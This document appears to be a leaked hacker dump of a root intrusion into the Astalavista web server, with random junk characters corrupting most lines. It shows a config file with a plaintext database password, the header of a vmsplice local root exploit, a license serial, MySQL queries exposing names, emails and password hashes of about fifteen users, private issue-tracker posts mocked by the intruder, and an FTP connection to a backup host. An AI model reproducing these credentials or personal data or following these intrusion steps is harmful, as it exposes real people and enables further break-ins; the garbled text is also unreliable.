<?PHP2 ^+ j# }: }4 S5 @! r$ W5 C4 X
// Variabeln f?r Verbindung zur Datenbank // z7 f$ B& c- b& |5 @: i
$conxHost = ‘localhost’; // MySQL hostname
" X4 U) K2 f/ Z& Z$ b. z: w2 U$conxUser = ‘hostinguser’; // MySQL user7 u- a3 u; H# T* [
$conxPassword = ‘cXvB3981′; // MySQL password' `, m5 L# J6 V1 ?
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
0 }/ e8 r0 i5 C0 X?>) Z/ |8 |" e: W% c" {% u% b. y
b* g# o6 t" X6 s& v n
sh-3.2# cd ..
* f" }* b5 z+ b! M" O5 l ssh-3.2# cd com8 d* z/ Q% O4 E5 Q5 y. I4 ]8 O
sh-3.2# ls -la* [& B, ~- w* e
total 1412087 g) K9 J0 \& y6 [6 y3 r
drwx–x–x 10 com com 4096 Apr 28 12:40 .
/ E3 e3 T4 C* ~0 m rdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
2 Z" D% [! D! A' zdrwx—— 2 com com 4096 Jun 4 04:04 backups. F/ Z ^3 {1 x1 L
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql6 G @0 R! ~+ B$ {' T6 b& e
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
! l9 E% k2 Y# }0 z: [" j-rw——- 1 com com 21880 Jun 2 08:07 .bash_history( @3 [; D' c5 T
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
$ N2 ~7 m. Q+ I4 O; P-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile8 M5 T# o+ P9 p/ W4 h5 ~
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
+ E `) Q, E5 g9 x: P! d- `- r/ }, tdrwx–x–x 3 com com 4096 Jan 29 2008 domains& } Q8 o2 I( {0 L: E/ L
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
6 x/ M; G8 K) v3 e" Wdrwxrwx— 3 com mail 4096 Jan 6 19:24 imap2 m, \7 ` T' V$ S0 N& G/ z
-rw——- 1 com com 69 Nov 18 2008 .lesshst
# A1 v* h6 V/ H. i# B7 i# fdrwx—— 2 com com 4096 Sep 24 2007 mail
+ W; D; f4 b5 i, r+ f-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history0 D% l0 Q! h) X
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp* |! t& c$ B1 D/ I. S4 l
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
1 w( U p5 B' h. Q; q" L3 U-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
' P. w, q7 l* vdrwx—— 2 com com 4096 Aug 26 2008 .ssh
- |, L* c: s* Y" T4 s) `, A; Q" R e-rwx—— 1 com com 8515 Feb 10 2008 t
0 _& P# T) p6 A/ W5 Y/ L-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c' A2 @' X& x- I. K' T3 E
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
$ n1 t) R- n( G-rw-rw-r– 1 com com 617 May 20 2008 .toprc J/ Q( K/ W' v% y) n/ @& `/ M9 S
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql" D5 Q0 i) }4 ^/ k
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo6 T2 T" c7 R5 i* k
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
/ ?* y" M: R+ G- g0 l
9 m% `; h6 S' J% f3 p9 f/ I6 y1 g$ I7 Esh-3.2# head t.c2 D. C+ K" X" m; `/ B0 i1 z' _
/*( j" _4 E# ?# M) K* d. |, p
* jessica_biel_naked_in_my_bed.c
, J% X* L( O: {*9 H' k9 x: G* Y6 ~
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
( \1 e$ S9 G5 l1 }. L. J7 U: _* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.' _5 X* {- e: b, O6 D) D# z
* Stejnak je to stare jak cyp a aj jakesyk rozbite.# F* s: R5 r6 Q* i5 V- r0 r! \
*; b) t% W+ X0 d5 Y
* Linux vmsplice Local Root Exploit4 u3 T# H! L# @
* By qaaz! ?. g6 C% e+ i1 A. [6 j0 A: i# o' r& C4 t4 `
*8 j" K5 a: `# Z% V& I3 y
6 F( A$ a9 z9 S7 N/ [5 N
sh-3.2# cd /
9 _6 k, ?) b6 C7 Y& Q1 c: Bsh-3.2# ls -la4 q- c+ U: f g0 s! O9 n
total 360* q) x# y- k0 f+ q/ V
drwxr-xr-x 25 root root 4096 Jun 3 02:43 . R! N5 Z6 b3 t0 t# C# Y" t) w
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
2 n% F4 b u6 ?! L" z' u; J-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
" N* q5 ^' x9 }-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
% ]* P% x. b4 Z: O-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db* Z. X! G8 A' |
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck- w3 E. e( c: h) E5 w. q, l7 S
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel! J# \4 X; C/ h4 w2 r
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup G! m/ Z, u, j P
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
/ X. J2 O1 v* c) Q; V) m7 ndrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot2 S; G; K5 ]& t! w
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
( s3 ^+ o5 q! N6 C. z) Bdrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
; |2 h5 t) v) sdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home
6 ?, i, d: H# `8 f: G+ T; o8 E% l-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf! N/ o- t% z+ e- d
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
) j2 k+ Q/ y5 M0 e( Y7 Gdrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
- u' I" X6 M# Z! N" Qdrwx—— 2 root root 16384 Sep 11 2007 lost+found% O6 Z! L3 P3 L4 R
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
% t8 ?: w- S) ]& I. c9 x: z) v& tdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc2 V" U5 @3 n* f3 S
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
5 b! l: O/ T1 _' W6 K$ d-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
, ~' q2 S/ Z1 C' m. I8 ?# [drwxr-xr-x 2 root root 0 Jun 3 02:43 net
$ {7 w8 Y8 O0 M& S& C# Adrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt( b; r& g, `& Y
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
2 i4 l2 n3 N) f/ Edrwxr-x— 15 root root 4096 Jun 4 08:40 root! E# k' ^0 h& ]
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
! I& c! Q; g' u0 e6 p% ]drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux1 `2 e* V8 ^ z* ?7 X( N; Y
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv/ y5 q: o2 O4 B, X! V ~
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
- z7 Q2 m* D3 Z& ]! M- B0 Kdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp6 N( o) D8 ^+ s/ B Q5 m% n
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr! D6 a0 U z/ s) \
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var. z* m9 @6 [. f: |" Z
3 {( b2 v# m1 l4 S8 V* \sh-3.2# cd opt2 G4 m) P( E* v
sh-3.2# ls -la0 F4 [; M" Y8 Q. N3 L0 Z
total 20/ l: D5 T/ @/ Y0 s
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
& ?9 u( N% ]' G7 r. i/ wdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..: B9 i, H: b2 r
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws$ F8 o+ h4 P+ ]; |( b
0 O- O6 {1 b% h4 k: l D- ?4 H1 Tsh-3.2# cd lsws/' A5 i: M4 Q9 B* e4 D6 W
sh-3.2# ls -la N; t! B/ c3 @4 ^6 c" N2 ~$ N3 P
total 1084 K3 P* D5 `' J1 _: H7 \
drwxr-xr-x 15 root root 4096 Mar 20 2008 .$ W9 ?- U4 h- q ~- u/ o
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ... a# B) B- W) z5 g# G% N
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons! |' K7 O9 R, ~" a; p
drwxr-xr-x 13 root root 4096 May 29 15:10 admin* v. u0 z/ g6 J& v; ^3 y0 @
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
$ ?9 Z- G; x6 {& I$ Ddrwxr-xr-x 2 root root 4096 May 29 15:10 bin; H8 J5 T" \+ u/ f
drwx—— 4 apache apache 4096 Jun 3 02:43 conf
4 P Y3 n# R3 ? K% O6 ^4 k' Odrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
m( }4 @; ~& J6 A7 C6 `drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
9 i) M9 S9 _; ^. m: U B( y- vdrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
& j$ X y2 B0 H# ^/ ndrwxr-xr-x 2 root root 4096 Sep 15 2008 lib
- I I$ b) N% `9 x1 D3 O7 a& Y: t-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE7 y3 ], V; m a3 Y3 u+ ?) R: X
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
3 Y; s6 x, F* p' u0 Q-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
. m( b7 p& @0 }* H3 X/ X8 s-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP1 U% |1 I8 s9 k& i$ |0 J, T! O5 X
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs' C5 i) |% {4 B1 r* }8 Y
drwxr-xr-x 2 root root 4096 Mar 20 2008 php2 O3 _- s( M1 w W
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild A. Y/ F, ]* r/ u
drwxr-xr-x 3 root root 4096 Mar 20 2008 share9 a$ D8 P9 Q+ ]) A4 v8 Z9 R* [; ]
-rw-r–r– 1 root root 6 May 29 15:10 VERSION9 {/ X+ i5 Q2 S% |: ]
2 [. i3 m. d$ E; C4 b1 g: Esh-3.2# cd conf
: D: E5 X8 p+ M4 d# ]& X; |sh-3.2# ls -la
. L' A5 L/ `1 c: e0 e' Itotal 48
3 x- n% ]+ ]0 W; |: [/ h8 Zdrwx—— 4 apache apache 4096 Jun 3 02:43 ., u4 d6 [: R) [+ L
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..+ z1 C, ~/ |; r" G. y% A/ ]
drwx—— 2 apache apache 4096 Mar 20 2008 cert5 L C9 Z0 T0 q! J& ?
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
7 ?4 m( A8 K ?$ z! m4 J3 M3 P6 x/ [-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
4 M4 X9 ]2 F8 k! _8 Z2 Y-rw-r–r– 1 root apache 0 Jun 3 14:11 .last# C1 @/ H8 R! e# k. d3 S' A+ P
-rw——- 1 apache apache 256 May 29 15:10 license.key6 Z5 L9 B, s$ ? |/ }" ?
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
: w' @& @) J( j# [-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties: d& f4 h' H0 ?0 u) f4 o
-rw——- 1 apache apache 20 May 29 15:10 serial.no
! ^2 ~3 u% s! F! k ~+ X7 {* xdrwx—— 2 apache apache 4096 Mar 20 2008 templates+ P/ {/ r: }1 \+ Q* o1 b
! Y% y% k9 a0 N* ^. c
sh-3.2# cat serial.no
/ l' I" r% Q5 O1 X. U+ T% q C1 SIbDl-oVsO-CKqL-wVRa7 r- a% \ w$ g& N3 d
3 M! q1 K# U; ]9 Z. f4 Q
sh-3.2# mysql
/ r g. Q& r/ Q3 t8 b& ]! oWelcome to the MySQL monitor. Commands end with ; or \g.
4 I3 F, G0 i9 Z5 lYour MySQL connection id is 286844
" [! L9 ~; j" r* F8 Y/ b5 j7 ?& K) MServer version: 5.0.45-community-log MySQL Community Edition (GPL)
5 H) }! V1 {$ ?
% p' w' I% e2 ~: [( ~5 F4 J! X( nType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.) u: I. Y8 C* }8 X" E
5 c% ?8 Q8 d K4 v5 y
mysql> show databases;; [$ v ?3 z1 ^; j6 D2 p
+———————–+; T: _2 j( r5 _4 y. [+ t1 u
| Database |7 B+ }) t( [6 s9 |( S3 G- v
+———————–+
7 A C8 H4 U4 W| information_schema |; X* _& L% O! k8 w/ e
| astanet_ads |
" n N' T( |# c8 ^9 E" Y0 ^ N" j| astanet_mailing_lists |! T/ g1 {$ @9 j
| astanet_mediawiki |' F. D U3 b$ w e2 x
| astanet_membersystem |
1 R2 {) k: b8 ]& o. U D. a [| com_contrexx |" k0 [& y$ x$ O8 l8 @
| com_contrexx2 |
% R7 t. j5 \* H' T+ c, l| com_contrexx2_live |' p9 B# R! F- t- n/ Y5 @0 h
| da_roundcube |" a# X3 K+ f! J/ T
| dolphin | x: }$ S; S0 R
| ideapool |0 B3 T5 X$ _+ ?
| mysql |
* B( ` p% d2 Q9 m; ?# g0 }) y| test |
; k0 U: n5 q+ I2 c5 X4 g2 a5 y4 l| yourmaster |
5 T8 I) g7 }. \/ p& u$ n" f/ q+———————–+4 U3 G# W7 h- l9 h7 C* s6 e8 V
14 rows in set (0.00 sec)3 L5 D3 B1 t2 S! {+ L
2 C5 M" `' ~. v0 Q1 \5 zmysql> use ideapool" C; J- q0 U. L l: F4 _ W
Database changed
) \9 j$ Y4 r+ Q' @& @$ hmysql> show tables;: u1 ^- O7 t# ] r; C) A! r
+———————————–+
/ }: o6 @6 w k( Y| Tables_in_ideapool |
0 t7 g7 R& _/ w7 ]6 f4 g1 w5 n$ ~+———————————–+
! ~# d5 m9 w" Z, k. o| eventum_columns_to_display |
3 {5 W! z1 ^) v! M! {| eventum_custom_field |5 h" v; |' _/ s V
| eventum_custom_field_option |$ G7 j+ h; i5 i0 T/ U
| eventum_custom_filter |
# u7 Y7 x' P9 g4 G4 L6 g/ B2 t| eventum_customer_account_manager |& Y1 \, p ?, W- O P
| eventum_customer_note |
+ W9 X! ^" m4 z| eventum_email_account |
; g0 ?- X* P5 d' v| eventum_email_draft | `$ w# Z: }/ d( L- s
| eventum_email_draft_recipient |1 H1 b4 X0 b$ i9 n9 A
| eventum_email_response |6 A( `, i- m2 E; Q! o" |, w
| eventum_faq |& I" h8 r/ @" }8 K
| eventum_faq_support_level |
4 a8 a( R, x+ `2 K8 N4 z9 W H0 s| eventum_group |
. N2 d( u% P4 d. b) h! ~' `' j; T| eventum_history_type |5 Y8 k% Y6 e7 i2 U* i" D# l
| eventum_irc_notice |
! U' p! X0 ~2 v9 b/ g$ p| eventum_issue |4 Y1 m2 R9 @& f" {
| eventum_issue_association |
6 @0 \2 h% c0 {% @1 z) L) q| eventum_issue_attachment |
' V! d( n. @& e) I1 V; z' m| eventum_issue_attachment_file |
+ Y- b: O4 B9 ?9 l1 t! {6 E; j| eventum_issue_checkin |
/ c" W) m. ]4 i$ x4 E3 l4 @- l| eventum_issue_custom_field |' B# {: D0 n& z# h" m2 d
| eventum_issue_history |) V' t5 |0 c1 {$ i% O* O- _( T6 R' V
| eventum_issue_quarantine |/ R, t+ _0 ^! i6 J+ p7 Z* f r
| eventum_issue_requirement |
9 ^1 K8 d8 W- y| eventum_issue_user |4 ]+ G0 Z- O0 Y" s2 }: _2 ]
| eventum_issue_user_replier |
* F0 i$ n$ g0 \* S M$ z| eventum_link_filter |+ [; s! q M2 F7 D* D, V8 j
| eventum_mail_queue |
* R% @: s7 y* D. J| eventum_mail_queue_log |) t- m/ L, V. ]
| eventum_news |
" w; a* z6 b- O B4 b| eventum_note |
& e! p) I& T% i {* `3 z| eventum_phone_support |+ w5 h# r+ t9 l7 y6 |8 P
| eventum_project |
% v( q6 c U) ], V( a/ o| eventum_project_category |
4 `5 K. U( y' X- \" f6 ~& j| eventum_project_custom_field |
! ^6 `8 ]" U# V| eventum_project_email_response |) n- d. Y! [. l
| eventum_project_field_display |
# J9 y8 M2 m! ~" O4 p/ R" B| eventum_project_group |
+ Y5 O x1 s9 R% i+ ?) }| eventum_project_link_filter |
3 I/ o: ?; l0 A0 Z; U% p! L| eventum_project_news |0 w$ S! i- Y& d* \
| eventum_project_phone_category |' ? j8 o9 O" @! t% c) C
| eventum_project_priority |& I% J2 x9 u' r! d$ e. v
| eventum_project_release |. m8 V) l" U- }' Z* @0 e4 t/ _
| eventum_project_round_robin |4 [$ `9 V) ]0 t( S/ a/ S' b
| eventum_project_status |
/ m: m* y0 P6 P+ W" n% K8 ]& N4 @/ b| eventum_project_status_date |
7 w. ^) y& g! g9 A! M; _8 }| eventum_project_user |
, v$ T3 r$ S4 D0 ~| eventum_reminder_action |$ D+ y8 a8 l4 U1 C) Q
| eventum_reminder_action_list |
+ v' T$ p9 `2 X- [( || eventum_reminder_action_type |
0 g5 P2 D. F- [1 o/ O- d| eventum_reminder_field |
) w& L, ^6 L3 T1 M" p| eventum_reminder_history |
8 c7 G$ M" r. ^| eventum_reminder_level |4 g6 P/ H, S6 I; M F: n- K9 [3 L# U
| eventum_reminder_level_condition |/ h' A9 }: Q1 h1 O1 c% q6 l
| eventum_reminder_operator |
! @8 B2 J/ b7 X8 x2 y9 g7 M| eventum_reminder_priority |: x1 ^3 \9 E% E8 F! d8 u
| eventum_reminder_requirement |1 X: x7 |# s( K" Q% ~9 \! |
| eventum_reminder_triggered_action |
! E9 ^" {5 f- K# D. W: r| eventum_resolution |
' [: M( d2 [( ^* T; R% O| eventum_round_robin_user |2 l u/ {0 `4 E4 t) E$ B
| eventum_search_profile |
# x) ~. O- k& ~/ W4 s. p1 T* `| eventum_status |
4 u [- A* ~. C| eventum_subscription |/ S; f& u k) r9 K( L3 {' V
| eventum_subscription_type |
2 A, U( _3 o4 \4 p| eventum_support_email |
' z9 z5 o0 [& c. k$ C8 e| eventum_support_email_body |, t! K y$ }% k/ W+ Y3 t
| eventum_time_tracking |7 Q- C; S# K/ Z
| eventum_time_tracking_category |0 G0 D3 k0 z* [4 H* M O
| eventum_user |
2 D7 Y8 X7 z! v: J7 D# |* X) R+———————————–+" c) T4 I. t c8 T
69 rows in set (0.00 sec)
/ f4 d- [& ?1 ~ d& U" j% x+ e# _7 E( m. j, \ g5 r
mysql> describe eventum_user;( r' m- [6 R4 V& }6 ^
+————————-+——————+——+—–+———————+—————-+
1 _% m$ |$ ^& K; X! C% T| Field | Type | Null | Key | Default | Extra |
% ?0 c8 ] {; k- q& Z+————————-+——————+——+—–+———————+—————-+" `* ^/ b( I ^9 y
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
% c5 u5 y8 d. }5 g3 Q& l b& ?| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
/ k5 l% }1 o) d( m5 C+ @$ p3 y9 H| usr_customer_id | int(11) unsigned | YES | | NULL | |
* X9 q0 F, I) Z9 ~; O ]. z| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |2 D/ R) g; I' l1 o6 l
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
3 B* n: |3 `9 q7 m/ \7 I* b| usr_status | varchar(8) | NO | | active | |$ M8 `& h# }' i, b
| usr_password | varchar(32) | NO | | | |4 l; F% v# V& G
| usr_full_name | varchar(255) | NO | | | |: m* u# h2 D$ c9 [5 e/ N, X3 Y; r7 k
| usr_email | varchar(255) | NO | UNI | | |) z5 H; s/ A+ |- }& ] w
| usr_preferences | longtext | YES | | NULL | |
# _- Q8 W/ b5 H' v% \+ G7 n# g5 || usr_sms_email | varchar(255) | YES | | NULL | |
0 a6 a' V, }$ H( w* l+ I, u/ X6 }| usr_clocked_in | tinyint(1) | YES | | 0 | |" h9 |/ Z4 D5 ~, b& n% \
| usr_lang | varchar(5) | YES | | NULL | | v v8 F ^! o
+————————-+——————+——+—–+———————+—————-+
5 {- R; \/ t4 B& Y$ w* n6 n$ x+ g. y13 rows in set (0.00 sec)
5 [( l* i6 e$ B- L* J" I \, F7 H% _1 M2 H! w2 ^3 R/ V, W$ {
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
. w( p% j1 P4 t( O, T; W7 a+———————-+——————————-+———————————-+
8 k# Y5 P- Q3 _" o+ }. n a| usr_full_name | usr_email | usr_password |
0 c H8 s& ^* q+———————-+——————————-+———————————-+
5 M/ m4 {- k2 Z, |+ X& S0 f! W| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |: A+ l% U9 h# R# v& @
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
; u2 a# ?. K9 N( p+ K| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
% A! {7 K6 r* a9 ^5 f3 g8 p| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
3 U R8 n5 c+ B1 ]# U5 j' X| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |3 I* ^5 ~: H$ t
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
1 S& o. l! |, e4 ?# B- d3 m| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
: f; Y0 ~0 o p. A T6 c. E" t| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
3 M% X4 T" U5 s4 R u- y3 j# _| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
- E1 w( p9 s# r% f' N R9 r' a( l| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |+ A l; B0 k# Z' z+ T( n1 \
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |. W: D5 U. R* o n" s! n
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |' {& k9 Z) l# J# S$ W3 g1 v/ X% N( k
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
; A% Q, z% s1 q4 r| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
2 R" d3 K6 \! O| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
9 d4 l- D3 z% V/ f U1 }7 n! @+———————-+——————————-+———————————-+
! k- C- [& M% ^+ L4 O15 rows in set (0.00 sec)
0 s: y8 [: X& `& ~" p: o
9 J: p( P9 L7 D# _ s2 _, f: dmysql> select iss_description from eventum_issue where iss_id = 43;
& O% A8 f; u6 H+ @6 N+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+/ G+ I1 D( Z: I+ C, ?1 \ K r; ]
| iss_description / V: J% S9 O g$ }/ T5 L/ D+ x
|! H" d# n4 X" g% g
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
- c: a& {# R @5 O| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be, R9 T' D4 P+ F) \
connected for 90 mins… 120mins… so what i propose is something like:
y6 c# N4 a7 A! X链接标记[url]http://www.surfthechannel.com/[/url]
& i' ?. t/ b; l$ @: N2 u& Gsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system: O* `$ m. y9 j+ k. h! u) h
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
1 q4 @- {! d. U4 e/ a( @! Y8 Cbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off2 O8 q; s; u& H! B# p/ J1 m2 ]2 d
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
: i- J& S2 r t* @2 R3 c/ M$ e. p6 }: m% T& [7 m: n
We could also put advertisement during play on the flash video player itself… extra $$…
: p, }8 e5 w0 V& A4 m' {6 f5 }+ ^* W
$ F& d, O; {8 n' P1 d1 v( EBy sykadul |7 N5 q/ ^9 {/ ~
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
$ [$ A8 @7 Q3 r4 s4 u+ |1 row in set (0.00 sec)
( X. @0 S5 d" j; D$ \5 v
+ E' G$ `( H9 F( F" M; X9 C7 j# n V// Money and extra $$ is all they care about. remember that.! W$ c& x* A0 u% G1 q% \+ k) L
6 E% u' b- n6 Jmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
. Y( T5 t/ W, S+————————+——————————————————————————————————————————————————————————————————————————————-+& Q2 X. m4 u' s9 X
| iss_summary | iss_description 5 q3 `- J! ?. [! i/ g. h5 E- ~. r7 D
|
. n$ L, q6 i, m! L" N+————————+——————————————————————————————————————————————————————————————————————————————-+, q8 \7 b: C7 @, M
| Forum for REAL EXPERTS | Hello,
H, b$ Z M" y4 Z+ p3 H$ F+ f) T
* W& e' ~; e4 w2 YIshtus and I,
B3 Z; x& H; Y% ~ ~) F7 m- ]! \0 e5 ]( Q9 s# L- j0 p h: w
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide! @) f# B& Z, H0 K+ U. Y: z0 i
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
) z' ^) _1 t# m- h8 y h8 J9 ~* |& U3 _% t9 i R! k
One example a friend of mine from coresecurity.com!& v) n9 L$ k) M% ]5 V. v& R2 u$ r
0 ]8 O* m' p, {& f& k) C# }
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..+ ~/ s. z% B# ~/ H( x3 d* J
; V* u8 n# u* x7 p: Q. Z3 M
|" D2 s, d2 _' A a0 O7 Y7 l
+————————+——————————————————————————————————————————————————————————————————————————————+
1 r8 P, K8 D' R# N" l3 J1 row in set (0.00 sec)6 h. d; g( }- H6 _' g" j* v$ R
( Z8 Q" Y& U, C6 n0 r3 V7 t* @
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…$ r2 C- j4 d, b! J
3 [( b& F7 n& t4 F# o
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
' |+ z: v8 o7 ~* j+——————+———————————————————————————————+1 e9 m4 h6 a3 t1 {! q- E2 e
| iss_summary | iss_description |/ ?! F1 i% D8 q# E% P! ^( V# n
+——————+———————————————————————————————+
s; \' L: b: x, S7 `0 s8 Y| Website guidance | Virtual Girl which guides you trought the website.7 O5 E1 n T; A# F0 F
! K0 N8 E! K) }
We need a girl with who you can ( talk )!!!
7 U7 L2 K b. h) ~9 _) E, JAlso for the News!5 n1 }6 S& i' W' h0 v( H6 U+ s
So my suggestion is a girl who read you the news loud if you like!" Z) I4 g; a+ @
you can choose between read yourselfe or she read it for you or both!" U% z. v2 e" o, `- ^! _
2 B8 y8 W- Q, B9 }# u% p
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!7 O$ B. R/ ~+ B D) p1 H& ]
$ K! g7 n/ }5 }% I$ L3 ]% |+ gHave a look on the example girls!!
' G1 T% t) t$ H- Q
8 ?! f& \- u) F6 _' N) o链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
* V5 s; J$ Y. c2 I$ H: H1 ?4 L2 |0 Y
or that
@% j: \ I) B' J
, j* R' C6 P! @* d链接标记[url]http://www.yellostrom.de/[/url]
* J; Q. Q7 A$ S, e2 M9 ~, A( l! p$ D8 d. f! r1 d) o
|' B5 A% I. a1 X- [! U, Y. b
+——————+———————————————————————————————+1 t0 o! }/ |4 C7 v l8 `% `
1 row in set (0.00 sec)
0 d+ f( {9 b3 u- a, Z0 d6 a: K- J/ {% y4 _2 c6 ~
// ha ha.
) N1 F5 d- S) N4 ~! u4 E, p- u" h M" d& ]# b1 e
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
: m0 H- M+ S3 C5 t# `+————————–+———————————————————————————————————–+4 ~+ j4 h' j5 b. L3 H: U2 S
| iss_summary | iss_description |5 ~8 n2 }4 n$ C8 v) l# G
+————————–+———————————————————————————————————–++ e" @* g6 S8 N3 b0 z
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |; r+ \) n, Q! W* ~& r! x
+————————–+———————————————————————————————————–+
. K3 t6 \- V( \1 row in set (0.00 sec)
# z( j2 M7 o+ @: \
" j& p& E4 Y6 F$ k U C// LOL.
: s5 [, I* z) m, B
' ^# K! {' k3 j% t, @mysql> exit; o; ^# d! ]: M
Bye! [4 g. T7 Q, P
8 }, R0 c- W) Q1 ?% F: Y0 G2 B. r( m. s6 k
sh-3.2# ftp 212.254.194.163
9 ?$ m. Y4 i8 Z) N, lConnected to 212.254.194.163.$ r7 s2 ^& o, e8 T7 ~; |
220 BackupCOM_VW FTP server ready.$ ]' @/ z3 ^6 o9 C: P
504 AUTH: security mechanism ‘GSSAPI’ not supported.8 D$ I' I( A4 |8 E* ]$ s5 j: W; u
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
